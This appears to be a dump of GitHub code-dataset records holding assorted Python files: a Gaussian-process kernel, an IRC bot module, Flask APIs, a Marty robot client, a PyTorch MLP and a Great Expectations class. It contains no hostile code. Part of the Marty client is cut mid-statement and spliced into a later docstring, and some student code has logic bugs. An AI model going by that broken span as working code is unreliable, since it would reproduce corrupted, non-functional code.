) -> CustomKernelParameters:\n return CustomKernel.Parameters(\n custom=parameters[\"custom\"],\n )\n\n def _calculate_gram(\n self,\n parameters: Union[Dict, FrozenDict, CustomKernelParameters],\n x1: jnp.ndarray,\n x2: jnp.ndarray,\n ) -> jnp.ndarray:\n \"\"\"\n Computing the Gram matrix with a custom kernel function.\n - m1 is the number of points in x1\n - m2 is the number of points in x2\n - d is the number of dimensions\n\n Args:\n parameters: parameters of the kernel\n x1: design matrix of shape (m1, d)\n x2: design matrix of shape (m2, d)\n\n Returns: the kernel gram matrix of shape (m_1, m_2)\n\n \"\"\"\n # convert to Pydantic model if necessary\n if not isinstance(parameters, self.Parameters):\n parameters = self.generate_parameters(parameters)\n return (\n jax.vmap(\n lambda x1_: jax.vmap(\n lambda x2_: self.kernel_function(parameters.custom, x1_, x2_)\n )(x2[:, None, ...])\n )(x1[:, None, ...])\n ).reshape(x1.shape[0], x2.shape[0])\n","repo_name":"jswu18/gvi-gaussian-process","sub_path":"src/kernels/custom_kernel.py","file_name":"custom_kernel.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"44549271475","text":"import os\n\nfrom . import Stasher\nfrom .Settings import init_settings\n\nclass NoDefault: pass\n\nclass BaseModule:\n \"\"\"This class is intended to provide a number of convenient and common\n features for kibot modules.\"\"\"\n\n def __init__(self, bot):\n \"\"\"\n 1) set the bot attribute\n 2) load the stasher if any _stash_attrs are defined\n 3) initialize the settings (setting any defaults if empty)\n 4) set any _on_XXXX handlers with priority 0\n \"\"\"\n self.bot = bot\n if self._stash_attrs: self._unstash()\n\n try: self._settings = init_settings(self, self._settings)\n except AttributeError: pass\n\n self._set_handlers()\n\n def _unload(self):\n \"\"\"\n 1) save the stasher if any _stash_attrs are defined\n 2) remove any _on_XXXX handlers\n \"\"\"\n if self._stash_attrs: self._stash()\n self._del_handlers()\n\n ######################################################################\n # stasher\n _stash_format = 'pickle'\n _stash_attrs = []\n #_stash_file = 'foo.pickle' # will appear in the \"data_dir\"\n def _get_stasher(self, filename=None, stash_format=None, **kwargs):\n if not stash_format: stash_format = self._stash_format\n if not filename:\n def_stash_basename = \"%s.%s\" % (self.__class__.__name__,\n stash_format)\n filename = getattr(self, '_stash_file', def_stash_basename)\n stash_file = os.path.join(self.bot.op.files.data_dir, filename)\n return Stasher.get_stasher(stash_file, stash_format, **kwargs)\n\n def _stash(self, default=NoDefault):\n \"\"\"Store the attributes listed in self._stash_attrs in a stasher.\n One will be created if necessary. If a value isn't set and\n a default is provided, that value will be used.\"\"\"\n if not hasattr(self, '_stasher'):\n self._stasher = self._get_stasher(autosync=0)\n for attr in self._stash_attrs:\n try: value = getattr(self, attr)\n except AttributeError:\n if not default == NoDefault:\n self._stasher[attr] = default\n else: self._stasher[attr] = value\n self._stasher.sync()\n\n def _unstash(self, default=NoDefault):\n \"\"\"Reload the attributes listed in self._stash_attrs from the\n stasher. If the attribute was not in the stasher (or if the file\n didn't exist) then the attribute will be set to 'default'. If\n default is not provided, then the attribute will not be set at all.\"\"\"\n\n if not hasattr(self, '_stasher'):\n self._stasher = self._get_stasher(autosync=0)\n\n for attr in self._stash_attrs:\n if default == NoDefault:\n try: value = self._stasher[attr]\n except KeyError: pass\n else: setattr(self, attr, value)\n else:\n value = self._stasher.get(attr, default)\n setattr(self, attr, value)\n\n ##################################################################3\n # handlers\n def _get_handlers(self, prefix):\n \"\"\"return a list of all event types for which it looks like\n the module has handlers. If the module has defined _on_join and\n _on_kick, then this will return ['join', 'kick']\n\n if the attribute self._handlers is defined, it will be returned\n instead\n \"\"\"\n try:\n handlers = self._handlers\n except AttributeError:\n handlers = []\n L = len(prefix)\n for f in dir(self):\n a = getattr(self, f)\n if callable(a) and f.startswith(prefix):\n handlers.append(f[L:])\n return handlers\n\n def _set_handlers(self, priority=0, prefix=\"_on_\"):\n \"\"\"set handlers for all methods with prefix \n For example, if the method _on_join is defined, then that method\n will be registered as handler for the \"join\" event.\n\n If the attribute self._handlers is defined, it will be used instead.\n each element of the self._handlers list should be the event type.\n\n def _handle_join(self, conn, event): pass\n def _handle_kick(self, conn, event): pass\n def _handle_part(self, conn, event): pass\n self._handlers = ['join', 'kick']\n self._set_handlers(prefix='_handle_')\n\n In this case, only the first two will be set. If self._handlers\n were not defined, then all three would be set.\n \"\"\"\n handlers = self._get_handlers(prefix)\n for h in handlers:\n self.bot.set_handler(h, getattr(self, prefix + h), priority)\n\n def _del_handlers(self, prefix=\"_on_\"):\n \"\"\"This \"undoes\" self._set_handlers\"\"\"\n handlers = self._get_handlers(prefix)\n for h in handlers:\n self.bot.del_handler(h, getattr(self, prefix + h))\n","repo_name":"pteichman/kibot","sub_path":"kibot/BaseModule.py","file_name":"BaseModule.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"70804376465","text":"from flask import Flask, jsonify\nfrom flask_cors import CORS\nfrom flask import request\nimport json\nimport pysolr\nimport sys\nsys.path.append(\"/home/luuthanh/Desktop/TKTD/backend\")\nfrom process_function import Query\n\n# configuration\nDEBUG = True\n\n# instantiate the app\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# enable CORS\nCORS(app, resources={r'/*': {'origins': '*'}})\n\n#connect Solr\npath = \"http://localhost:8983/solr/TestConfig/\"\n\n# sanity check route\n\n@app.route('/api', methods = ['POST'])\ndef get_results():\n str_a = request.data.decode(\"utf-8\")\n dict = json.loads(str_a)\n print(dict)\n rq = Query(lan=\"vi\",show_score= True ,start=0,rows=40,request_dict=dict,connect_solr=path)\n arr_results,time, hits = rq.get_results()\n time_str = \"Khoảng {} kết quả. Truy vấn hết {} ms\".format(hits,time)\n print(rq.get_results()[1])\n return jsonify(arr_results = arr_results, time = time_str )\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"cuonghp2112/TKTD","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71246326227","text":"import six\nimport struct\nfrom .utils import dict_merge\nfrom .serialclient import SerialClient\nfrom .socketclient import SocketClient\nfrom .rosclient import ROSClient\nfrom .testclient import TestClient\nfrom .exceptions import (MartyCommandException,\n MartyConnectException,\n MartyConfigException,\n ArgumentOutOfRangeException)\n\n\nclass Marty(object):\n '''\n High-level client library for Marty the Robot by Robotical Ltd\n '''\n\n CLIENT_TYPES = {\n 'socket' : SocketClient,\n 'serial' : SerialClient,\n 'ros' : ROSClient,\n 'test' : TestClient,\n }\n\n def __init__(self, url='socket://marty.local',\n client_types=dict(),\n default_lifelike=True,\n *args, **kwargs):\n '''\n Initialise a Marty client class from a url\n\n Args:\n url: Describes where the Marty can be found and what protocol it's speaking\n\n Raises:\n MartyConnectException if the client couldn't be initialised\n '''\n\n proto, _, loc = url.partition('://')\n\n self.CLIENT_TYPES = dict_merge(self.CLIENT_TYPES, client_types)\n\n if not (proto and loc):\n raise MartyConfigException('Invalid URL format \"{}\" given'.format(url))\n\n if proto not in self.CLIENT_TYPES.keys():\n raise MartyConfigtException('Unrecognised URL protocol \"{}\"'.format(proto))\n\n # Initialise the client class used to communicate with Marty\n self.client = self.CLIENT_TYPES[proto](proto, loc, *args, **kwargs)\n\n # To be able to do anything:\n self.enable_safeties(True)\n self.enable_motors(True)\n\n if default_lifelike:\n self.lifelike_behaviour(True)\n\n\n def _pack_uint16(self, num):\n '''\n Pack an unsigned 16 bit int into two 8 bit bytes, little-endian\n Returns:\n tuple(least-sig-byte, most-sig-byte)\n\n Struct:\n Fmt C Type Python Type Standard Size\n h short/uint16 integer 2\n '''\n try:\n data = struct.pack('= 0 (non-negative)\n '''\n return bool(self.client.execute('gpio', self._pack_uint8(gpio)))\n\n\n def i2c_write(self, *byte_array):\n '''\n Write a bytestream to the i2c port.\n The first byte should be the address, following from that\n the datagram folows standard i2c spec\n '''\n return self.client.execute('i2c_write', *byte_array)\n\n\n def i2c_write_to_rick(self, address, byte_array):\n '''\n Write a formatted bytestream to the i2c port.\n The bytestream is formatted in the ROS serial format.\n\n address: the other device's address\n '''\n\n data = ['\\x1B'] #i2c_write opcode\n data.append(address) #i2c address\n data.append(byte_array) #message\n data += self.ros_serial_formatter(111, *byte_array) #ros serial format\n return self.client.execute('i2c_write', *data)\n\n def get_battery_voltage(self):\n '''\n Returns:\n The battery voltage reading as a float in Volts\n '''\n return self.client.execute('battery')\n\n\n ACCEL_AXES = {\n 'x' : '\\x00',\n 'y' : '\\x01',\n 'z' : '\\x02',\n }\n\n\n def get_accelerometer(self, axis):\n '''\n Args:\n axis: str 'x', 'y' or 'z'\n Returns:\n The most recently read x, y and z accelerations\n '''\n try:\n ax = self.ACCEL_AXES[axis]\n except KeyError:\n raise MartyCommandException(\"Axis must be one of {}, not '{}'\"\n \"\".format(set(self.ACCEL_AXES.keys()), axis))\n return self.client.execute('accel', ax)\n\n\n def get_motor_current(self, motor_id):\n '''\n Args:\n motor_id, integer >= 0 (non-negative) selects which motor to query\n Returns:\n Instantaneous current sense reading from motor `motor_id`\n '''\n return self.client.execute('motorcurrent', str(motor_id))\n\n\n def enable_motors(self, enable=True, clear_queue=True):\n '''\n Toggle power to motors\n Args:\n enable: True/False toggle\n clear_queue: Default True, prevents unfinished but 'muted' motions\n from jumping as soon as motors are enabled\n '''\n if clear_queue:\n self.stop('clear queue')\n if enable:\n return self.client.execute('enable_motors') and True\n else:\n return self.client.execute('disable_motors') and False\n\n\n def enable_safeties(self, enable=True):\n '''\n Tell the board to turn on 'normal' safeties\n '''\n return self.client.execute('enable_safeties')\n\n\n def fall_protection(self, enable=True):\n '''\n Toggle fall protections\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('fall_protection', enable)\n\n\n def motor_protection(self, enable=True):\n '''\n Toggle motor current protections\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('motor_protection', enable)\n\n\n def battery_protection(self, enable=True):\n '''\n Toggle low battery protections\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('battery_protection', enable)\n\n\n def buzz_prevention(self, enable=True):\n '''\n Toggle motor buzz prevention\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('buzz_prevention', enable)\n\n\n def lifelike_behaviour(self, enable=True):\n '''\n Tell the robot whether it can or can't move now and then in a lifelike way when idle.\n Args:\n enable: True/False toggle\n '''\n return self.client.execute('lifelike_behaviour', enable)\n\n\n def set_parameter(self, *byte_array):\n '''\n Set board parameters.\n\n Args:\n byte_array: a list in the following format [paramID, params]\n '''\n return self.client.execute('set_param', '\\x1F',*byte_array)\n\n\n def save_calibration(self):\n '''\n Set the current motor positions as the zero positions\n BE CAREFUL, this can cause unexpected movement or self-interference\n '''\n return self.client.execute('save_calibration')\n\n\n def clear_calibration(self):\n '''\n Tell the Robot to forget it's calibration\n BE CAREFUL, this can cause unexpected movement or self-interference\n '''\n return self.client.execute('clear_calibration')\n\n\n def ros_command(self, *byte_array):\n '''\n Low level proxied access to the ROS Serial API between\n the modem and main controller\n '''\n return self.client.execute('ros_command', *byte_array)\n\n\n def keyframe (self, time, num_of_msgs, msgs):\n '''\n Takes in information about movements and generates keyframes\n returns a list of bytes\n\n time: time (in seconds) taken to complete movement\n num_of_msgs: number of commands sent\n msgs: commands sent in the following format [(ID CMD), (ID CMD), etc...]\n '''\n processed_keyframe = []\n\n #Number of key frames\n len_byte0, len_byte1, len_byte2, len_byte3 = self._pack_int32(1)\n processed_keyframe.append(len_byte0)\n processed_keyframe.append(len_byte1)\n processed_keyframe.append(len_byte2)\n processed_keyframe.append(len_byte3)\n\n #Time (in seconds) to excute keyframe. This is float encoded.\n time_byte0, time_byte1, time_byte2, time_byte3 = self._pack_float(time)\n processed_keyframe.append(time_byte0)\n processed_keyframe.append(time_byte1)\n processed_keyframe.append(time_byte2)\n processed_keyframe.append(time_byte3)\n\n if(len(msgs) != num_of_msgs):\n raise MartyCommandException('Number of messages do not match entered messages')\n #Array length\n arr_len_byte0, arr_len_byte1, arr_len_byte2, arr_len_byte3 = self._pack_int32(num_of_msgs)\n processed_keyframe.append(arr_len_byte0)\n processed_keyframe.append(arr_len_byte1)\n processed_keyframe.append(arr_len_byte2)\n processed_keyframe.append(arr_len_byte3)\n\n #Messages\n for items in msgs:\n for values in items:\n processed_keyframe.append(self._pack_int8(values))\n\n return(processed_keyframe)\n\n\n\n def get_chatter(self):\n '''\n Return chatter topic data (variable length)\n '''\n return self.client.execute('chatter')\n\n\n def get_firmware_version(self):\n '''\n Ask the board to print the firmware version over chatter\n '''\n return self.client.execute('firmware_version')\n\n\n def _mute_serial(self):\n '''\n Mutes the internal serial line on Rick. Depends on platform and API\n NOTE: Once you've done this, the Robot will ignore you until you cycle power.\n '''\n return self.client.execute('mute_serial')\n\n\n def ros_serial_formatter(self, topicID, *message):\n '''\n Formats message into ROS serial format and\n returns formatted message as a list\n\n More information about the ROS serial format can be\n found here: http://wiki.ros.org/rosserial/Overview/Protocol\n '''\n msg = message\n\n msg_length = len(msg)\n #Message length in little endian format\n msg_length_LB = msg_length & 0xFF #3rd byte\n msg_length_HB = (msg_length >> 8) & 0xFF #4th byte\n\n checksum1 = 255 - ((msg_length_LB + msg_length_HB) % 256) #5th byte\n\n #Topic ID in little endian format\n topic_ID_LB = topicID & 0xFF #6th byte\n topic_ID_HB = (topicID >> 8) & 0xFF #7th byte\n\n data_values_sum = 0\n for i in msg:\n data_values_sum += ord(i)\n\n checksum2 = 255 - ((topic_ID_LB + topic_ID_HB + data_values_sum) % 256) #final byte\n\n #encode into bytes\n command_to_be_sent = []\n command_to_be_sent += ('\\xff',) #Sync Flag. Check ROS Wiki\n command_to_be_sent += ('\\xfe',) #Protocol version. Check ROS Wiki\n command_to_be_sent += (chr(msg_length_LB),)\n command_to_be_sent += (chr(msg_length_HB),)\n command_to_be_sent += (chr(checksum1),)\n command_to_be_sent += (chr(topic_ID_LB),)\n command_to_be_sent += (chr(topic_ID_HB),)\n command_to_be_sent += msg\n command_to_be_sent += (chr(checksum2),)\n\n return(command_to_be_sent)\n\n\n def ros_processed_command(self, topicID, *message):\n '''\n Formats message into ROS serial format then calls\n ros_command with the processed message.\n\n More information about the ROS serial format can be\n found here: http://wiki.ros.org/rosserial/Overview/Protocol\n '''\n msg = message\n\n msg_length = len(msg)\n #Message length in little endian format\n msg_length_LB = msg_length & 0xFF #3rd byte\n msg_length_HB = (msg_length >> 8) & 0xFF #4th byte\n\n checksum1 = 255 - ((msg_length_LB + msg_length_HB) % 256) #5th byte\n\n #Topic ID in little endian format\n topic_ID_LB = topicID & 0xFF #6th byte\n topic_ID_HB = (topicID >> 8) & 0xFF #7th byte\n\n data_values_sum = 0\n for i in msg:\n data_values_sum += ord(i)\n\n checksum2 = 255 - ((topic_ID_LB + topic_ID_HB + data_values_sum) % 256) #final byte\n\n #encode into bytes\n command_to_be_sent = []\n command_to_be_sent += ('\\xff',) #Sync Flag. Check ROS Wiki\n command_to_be_sent += ('\\xfe',) #Protocol version. Check ROS Wiki\n command_to_be_sent += (chr(msg_length_LB),)\n command_to_be_sent += (chr(msg_length_HB),)\n command_to_be_sent += (chr(checksum1),)\n command_to_be_sent += (chr(topic_ID_LB),)\n command_to_be_sent += (chr(topic_ID_HB),)\n command_to_be_sent += msg\n command_to_be_sent += (chr(checksum2),)\n\n self.ros_command(*command_to_be_sent)\n","repo_name":"ymohamedahmed/part1a","sub_path":"pre/marty/VENV/lib/python3.6/site-packages/martypy/marty.py","file_name":"marty.py","file_ext":"py","file_size_in_byte":23406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4485619143","text":"#212\n#pagno43\nclass TrieNode:\n def __init__(self):\n self.children = [None]*26\n self.endOfWord = False\n\n def insert(self, word):\n curr = self\n for c in word:\n idx = ord(c) - ord('a')\n if curr.children[idx] == None:\n curr.children[idx] = TrieNode()\n curr = curr.children[idx]\n curr.endOfWord = True\n \ndef findWords(board, words):\n if len(words) == 0: return []\n trie = TrieNode()\n for w in words:\n trie.insert(w)\n result = set()#koi duplicate word na aaye islia set consider kr rhe h\n \n \n for i in range(len(board)):\n for j in range(len(board[0])):\n dfs(board,i, j, trie, \"\", result)\n result_v = list(result)\n return result_v\n\ndef dfs(board, i, j, trie, s, result):\n c = board[i][j]\n if c == '$': return\n board[i][j] = '$'\n t = trie.children[ord(c) - ord('a')]\n if(t != None):\n ss = s + c\n if t.endOfWord: result.add(ss)\n if i < len(board) - 1: dfs(board, i + 1, j, t, ss, result)\n if j < len(board[0])-1: dfs(board, i, j + 1, t, ss, result)\n if i < 0: dfs(board, i - 1, j, t, ss, result)\n if j > 0: dfs(board, i, j - 1, t, ss, result)\n board[i][j]=c \n\n \n \n \nr = input().split()\nb = r[2:]\nboard = [[ b[int(r[1])*i+j] for j in range(int(r[1])) ] for i in range(int(r[0]))]\n##print(board)\nwords = [\"oath\",\"pea\",\"eat\",\"rain\"]\nk = findWords(board, words)\nprint(*k)\n\n\n\n\n\n\n\n\n \n","repo_name":"nilankh/LeetCodeProblems","sub_path":"Backtracking/WordSearch2#212.py","file_name":"WordSearch2#212.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70190110546","text":"\"\"\"\r\nversion: python 3.8\r\nload_data.py defines the load function to load data from data/\r\n (only when the files have the correct name style)\r\n\r\nauthors:\r\n Dani van Enk, 11823526\r\n Michael Faber, 6087582\r\n\"\"\"\r\n\r\n# used imports\r\nimport csv\r\nfrom code.classes import Station, Connection\r\n\r\n\r\ndef load(stations_file, connections_file):\r\n \"\"\"\r\n loads data files into database\r\n\r\n parameters:\r\n stations_file - path to the stations file;\r\n connections_file - path to the connections file;\r\n\r\n returns stations dictionary and connection list\r\n \"\"\"\r\n\r\n # make sure stations file exists\r\n try:\r\n\r\n # get csv reader object from the datafile\r\n stations_reader = csv.reader(\r\n open(stations_file, \"r\", encoding=\"utf-8\"), delimiter=\",\")\r\n\r\n # skip header\r\n next(stations_reader)\r\n\r\n except FileNotFoundError:\r\n exit(f\"{stations_file} not found\")\r\n\r\n # make sure connections file exists\r\n try:\r\n\r\n # get csv reader object from the datafile\r\n connections_reader = csv.reader(\r\n open(connections_file, \"r\", encoding=\"utf-8\"), delimiter=\",\")\r\n\r\n # skip header\r\n next(connections_reader)\r\n\r\n except FileNotFoundError:\r\n exit(f\"{connections_file} not found\")\r\n\r\n # add stations and connections to database\r\n stations = {name: Station(name, lat, long)\r\n for name, lat, long in stations_reader}\r\n connections = [Connection(stations[start], stations[end], duration)\r\n for start, end, duration in connections_reader]\r\n\r\n return stations, connections\r\n","repo_name":"danivenk/UVA_Minor-Programming_Programming-Theory","sub_path":"code/data_loader/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17043771227","text":"import json\nimport time\nfrom threading import Thread\n\nfrom flask import Flask, request\nfrom flask_cors import CORS\n\nimport Config\nfrom GameObjects.Player import Player\nfrom PlayerManager import PlayerManager\nfrom Position import Position\nfrom Renderer import Renderer\nfrom WorldManager import WorldManager\n\napp = Flask(__name__)\nCORS(app)\n\nrenderer = Renderer()\nworld_manager = WorldManager()\nplayer_manager = PlayerManager()\n\nplayers = []\n\n\n@app.route('/get_worlds_info')\ndef get_worlds_info():\n answer = {\"status\": \"success\", \"message\": []}\n for cur_world in world_manager.worlds:\n answer.get(\"message\").append({\"id\": cur_world.world_id, \"name\": cur_world.world_name})\n return answer\n\n\n@app.route('/get_legend')\ndef get_legend():\n answer = {\"status\": \"success\", \"message\": world_manager.world_legend}\n return answer\n\n\n@app.route('/auth_player', methods=['POST'])\ndef spawn_player():\n request_data = json.loads(request.data)\n world_id = request_data.get(\"world_id\")\n world = world_manager.get_world_by_id(int(world_id))\n player_name = request_data.get(\"name\")\n password = request_data.get(\"password\")\n player_auth_result = player_manager.create_or_load_player(player_name, password, world)\n if player_auth_result.get(\"status\") == \"success\":\n player = player_auth_result.get(\"player\")\n return {\"status\": \"success\", \"message\": {\"player_id\": player.player_id}}\n else:\n error_message = player_auth_result.get(\"error\")\n return {\"status\": \"error\", \"message\": error_message}\n\n\n@app.route('/render_player')\ndef render_player():\n cur_player_id = request.args.get(\"id\")\n player = player_manager.get_player_by_id(int(cur_player_id))\n world = world_manager.get_world_by_id(int(0))\n result = renderer.render_for_player(player, world)\n return result\n\n\n@app.route('/move_player')\ndef move_player():\n cur_player_id = request.args.get(\"id\")\n move_side = request.args.get(\"move_side\")\n print(request.args)\n player = player_manager.get_player_by_id(int(cur_player_id))\n world = world_manager.get_world_by_id(int(0))\n result = player.move(world, move_side)\n return {\"status\": \"success\", \"message\": result}\n\n\ndef start():\n world_manager.generate_main_world(10, 10)\n app.run(debug=Config.DEBUG, host=Config.HOST, port=Config.PORT)\n\n\ndef auto_save():\n print(\"i'm alive\")\n time.sleep(30)\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"Zemllia/rpgram2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21964577396","text":"\"\"\"\r\nThis module implements a multi-layer perceptron (MLP) in PyTorch.\r\nYou should fill in code into indicated sections.\r\n\"\"\"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch import functional as F\r\n\r\nclass MLP(nn.Module):\r\n \"\"\"\r\n This class implements a Multi-layer Perceptron in PyTorch.\r\n It handles the different layers and parameters of the model.\r\n Once initialized an MLP object can perform forward.\r\n \"\"\"\r\n\r\n def __init__(self, n_inputs, n_hidden, n_classes):\r\n \"\"\"\r\n Initializes MLP object. \r\n \r\n Args:\r\n n_inputs: number of inputs.\r\n n_hidden: list of ints, specifies the number of units\r\n in each linear layer. If the list is empty, the MLP\r\n will not have any linear layers, and the model\r\n will simply perform a multinomial logistic regression.\r\n n_classes: number of classes of the classification problem.\r\n This number is required in order to specify the\r\n output dimensions of the MLP\r\n\r\n \"\"\"\r\n super(MLP, self).__init__()\r\n\r\n self.layers = nn.ModuleList()\r\n self.relu = nn.ReLU()\r\n\r\n for i in range(len(n_hidden)):\r\n if i == 0:\r\n layer = nn.Linear(n_inputs, n_hidden[i])\r\n else:\r\n layer = nn.Linear(n_hidden[i-1], n_hidden[i])\r\n\r\n torch.nn.init.xavier_uniform(layer.weight)\r\n layer.bias.data.fill_(0.01)\r\n #nn.init.normal_(layer.weight, mean = 0, std = 0.0001)\r\n self.layers.append(layer)\r\n\r\n if i < 3:\r\n self.layers.append(nn.ReLU(0.2))\r\n\r\n\r\n self.layers.append(nn.Linear(n_hidden[len(n_hidden) - 1], n_classes))\r\n torch.nn.init.xavier_uniform(layer.weight)\r\n layer.bias.data.fill_(0.01)\r\n self.layers.append(nn.Softmax(dim=1))\r\n\r\n print(self.layers)\r\n\r\n\r\n\r\n def forward(self, x):\r\n \"\"\"\r\n Performs forward pass of the input. Here an input tensor x is transformed through \r\n several layer transformations.\r\n \r\n Args:\r\n x: input to the network\r\n Returns:\r\n out: outputs of the network\r\n\r\n \"\"\"\r\n\r\n for layer in self.layers:\r\n x = layer(x)\r\n x = self.relu(x)\r\n\r\n return x\r\n","repo_name":"mhashas/dl-assignments","sub_path":"assignment_1/code/mlp_pytorch.py","file_name":"mlp_pytorch.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33151698286","text":"\ndef classification(word):\n num, string = '', ''\n\n for i in word:\n if i in '0123456789':\n num += i\n else:\n string += i\n return num, string\n\n\n\ndef process(word):\n num, string, answer = '', '', ''\n\n num, string = classification(word)\n \n if abs(len(num) - len(string)) >= 2:\n return ''\n\n elif len(num) - len(string) == 1:\n for i in range(len(string)):\n answer += num[i]\n answer += string[i]\n answer += num[-1]\n\n elif len(num) - len(string) == -1:\n for i in range(len(num)):\n answer += string[i]\n answer += num[i]\n answer += string[-1] \n\n else:\n for i in range(len(num)):\n answer += num[i]\n answer += string[i]\n\n return answer\n \nprint(process(\"12f3f4ss4fe\"))","repo_name":"HeoYou/algorithm-python","sub_path":"ex ct1.py","file_name":"ex ct1.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10793768816","text":"from typing import Dict, Optional\n\nimport altair as alt\nimport pandas as pd\n\nfrom great_expectations.core.expectation_configuration import ExpectationConfiguration\nfrom great_expectations.execution_engine import ExecutionEngine\nfrom great_expectations.expectations.expectation import (\n ColumnExpectation,\n InvalidExpectationConfigurationError,\n)\nfrom great_expectations.expectations.metrics.util import parse_value_set\nfrom great_expectations.expectations.util import (\n add_values_with_json_schema_from_list_in_params,\n render_evaluation_parameter_string,\n)\nfrom great_expectations.render.renderer.renderer import renderer\nfrom great_expectations.render.types import (\n RenderedGraphContent,\n RenderedStringTemplateContent,\n)\nfrom great_expectations.render.util import (\n parse_row_condition_string_pandas_engine,\n substitute_none_for_missing,\n)\n\n\nclass ExpectColumnDistinctValuesToBeInSet(ColumnExpectation):\n \"\"\"Expect the set of distinct column values to be contained by a given set.\n\n The success value for this expectation will match that of expect_column_values_to_be_in_set. However,\n expect_column_distinct_values_to_be_in_set is a \\\n :func:`column_aggregate_expectation \\\n `.\n\n For example:\n ::\n\n # my_df.my_col = [1,2,2,3,3,3]\n >>> my_df.expect_column_distinct_values_to_be_in_set(\n \"my_col\",\n [2, 3, 4]\n )\n {\n \"success\": false\n \"result\": {\n \"observed_value\": [1,2,3],\n \"details\": {\n \"value_counts\": [\n {\n \"value\": 1,\n \"count\": 1\n },\n {\n \"value\": 2,\n \"count\": 1\n },\n {\n \"value\": 3,\n \"count\": 1\n }\n ]\n }\n }\n }\n\n Args:\n column (str): \\\n The column name.\n value_set (set-like): \\\n A set of objects used for comparison.\n\n Keyword Args:\n parse_strings_as_datetimes (boolean or None) : If True values provided in value_set will be parsed \\\n as datetimes before making comparisons.\n\n Other Parameters:\n result_format (str or None): \\\n Which output mode to use: `BOOLEAN_ONLY`, `BASIC`, `COMPLETE`, or `SUMMARY`. \\\n For more detail, see :ref:`result_format `.\n include_config (boolean): \\\n If True, then include the expectation config as part of the result object. \\\n For more detail, see :ref:`include_config`.\n catch_exceptions (boolean or None): \\\n If True, then catch exceptions and include them as part of the result object. \\\n For more detail, see :ref:`catch_exceptions`.\n meta (dict or None): \\\n A JSON-serializable dictionary (nesting allowed) that will be included in the output without \\\n modification. For more detail, see :ref:`meta`.\n\n Returns:\n An ExpectationSuiteValidationResult\n\n Exact fields vary depending on the values passed to :ref:`result_format ` and\n :ref:`include_config`, :ref:`catch_exceptions`, and :ref:`meta`.\n\n See Also:\n :func:`expect_column_distinct_values_to_contain_set \\\n `\n\n \"\"\"\n\n # This dictionary contains metadata for display in the public gallery\n library_metadata = {\n \"maturity\": \"production\",\n \"tags\": [\"core expectation\", \"column aggregate expectation\"],\n \"contributors\": [\"@great_expectations\"],\n \"requirements\": [],\n \"has_full_test_suite\": True,\n \"manually_reviewed_code\": True,\n }\n\n # Setting necessary computation metric dependencies and defining kwargs, as well as assigning kwargs default values\\\n metric_dependencies = (\"column.value_counts\",)\n success_keys = (\n \"value_set\",\n \"parse_strings_as_datetimes\",\n )\n\n # Default values\n default_kwarg_values = {\n \"value_set\": None,\n \"parse_strings_as_datetimes\": False,\n \"result_format\": \"BASIC\",\n \"include_config\": True,\n \"catch_exceptions\": False,\n }\n args_keys = (\n \"column\",\n \"value_set\",\n )\n\n @classmethod\n def _atomic_prescriptive_template(\n cls,\n configuration=None,\n result=None,\n language=None,\n runtime_configuration=None,\n **kwargs,\n ):\n runtime_configuration = runtime_configuration or {}\n include_column_name = runtime_configuration.get(\"include_column_name\", True)\n include_column_name = (\n include_column_name if include_column_name is not None else True\n )\n styling = runtime_configuration.get(\"styling\")\n\n params = substitute_none_for_missing(\n configuration.kwargs,\n [\"column\", \"value_set\", \"row_condition\", \"condition_parser\"],\n )\n params_with_json_schema = {\n \"column\": {\"schema\": {\"type\": \"string\"}, \"value\": params.get(\"column\")},\n \"value_set\": {\n \"schema\": {\"type\": \"array\"},\n \"value\": params.get(\"value_set\"),\n },\n \"row_condition\": {\n \"schema\": {\"type\": \"string\"},\n \"value\": params.get(\"row_condition\"),\n },\n \"condition_parser\": {\n \"schema\": {\"type\": \"string\"},\n \"value\": params.get(\"condition_parser\"),\n },\n }\n\n if params[\"value_set\"] is None or len(params[\"value_set\"]) == 0:\n\n if include_column_name:\n template_str = \"$column distinct values must belong to this set: [ ]\"\n else:\n template_str = \"distinct values must belong to a set, but that set is not specified.\"\n\n else:\n\n for i, v in enumerate(params[\"value_set\"]):\n params[f\"v__{str(i)}\"] = v\n values_string = \" \".join(\n [f\"$v__{str(i)}\" for i, v in enumerate(params[\"value_set\"])]\n )\n\n if include_column_name:\n template_str = (\n f\"$column distinct values must belong to this set: {values_string}.\"\n )\n else:\n template_str = (\n f\"distinct values must belong to this set: {values_string}.\"\n )\n\n if params[\"row_condition\"] is not None:\n (\n conditional_template_str,\n conditional_params,\n ) = parse_row_condition_string_pandas_engine(\n params[\"row_condition\"], with_schema=True\n )\n template_str = f\"{conditional_template_str}, then {template_str}\"\n params_with_json_schema.update(conditional_params)\n\n params_with_json_schema = 